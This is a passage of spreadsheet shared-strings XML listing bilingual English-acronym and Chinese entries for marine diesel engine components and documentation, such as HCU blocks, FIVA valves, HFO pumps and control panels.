    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>C.P.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换算程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CADAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件清单，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>DEP.2040</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CAPA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>性能系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CCAI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>净化图解</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，软件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CD-rom,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CD-ROM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准件安装说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CE-MARKING </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补充图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CE-MARK</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CFH</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CFM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CMP 402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CMS 402A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室操作面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CoCoS - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机诊断系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>COCOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>COCOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CPP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CSP-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集控室安全控制盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>DC/DC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>DIN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>DISA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测速计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">DISC </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>镶孔</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>E1-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件包</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>EDS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>EL.</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ELFI/ELVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀测试装置生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ELFI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ELVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">EMS </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>EN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准套件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（螺丝</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>EPROM-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>存储器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ESC-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴的电控箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ESD </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护袋</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ETC-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急车钟控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ETP_er-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急车钟面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>F/I</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀首次认可质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FIVA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标记</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FLEXSTAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">GETO - </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操作数据反馈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>GMS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本体液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OMD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基板焊接图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基板机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块放泄孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块泄漏检测</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洁和检查的质量规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HCU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗和检查</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供应泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>ＨＦＯ－燃油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护，大修期</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>维护，日常</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>循环泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">HHI </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - 3M-009512-1</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">HHI </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>交流发电机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> - 3M-011003-1</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HHJ</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF/HOT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺栓液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOF</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOLSET</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HOYT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑（焊接）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HPS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑（加工）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>本体液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>HT</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>H</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>I/P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">IB900-913 </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>索引</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低负荷控制箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀剩余空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>逆流监视器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ICS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀剩余空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>IFO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>IMO Nox</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（氮氧化物）部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵备件</t>
    </r>
